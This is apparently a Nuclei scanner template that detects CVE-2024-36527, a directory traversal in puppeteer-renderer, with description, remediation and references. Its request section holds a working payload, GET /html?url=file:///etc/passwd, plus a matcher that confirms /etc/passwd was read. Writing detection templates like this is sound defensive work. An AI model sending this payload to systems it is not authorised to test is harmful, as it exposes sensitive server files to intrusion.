36 lines
1.4 KiB
YAML
36 lines
1.4 KiB
YAML
id: CVE-2024-36527
|
|
|
|
info:
|
|
name: Puppeteer Renderer - Directory Traversal
|
|
author: Stux
|
|
severity: medium
|
|
description: |
|
|
puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
|
|
remediation: |
|
|
Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
|
|
reference:
|
|
- https://github.com/zenato/puppeteer-renderer/issues/97
|
|
- https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
tags: cve,cve2024,puppeteer-renderer
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/html?url=file:///etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022013c982e61cebb23f2b135c2c6217fc117c36dd1f7319f5c9a4ddb1c29b4b1dfd022100c1592cd46ccdc9192bec332e0170e09c5eb0dff7288f54f82bab302a9da281cd:922c64590222798bb761d5b6d8e72950 |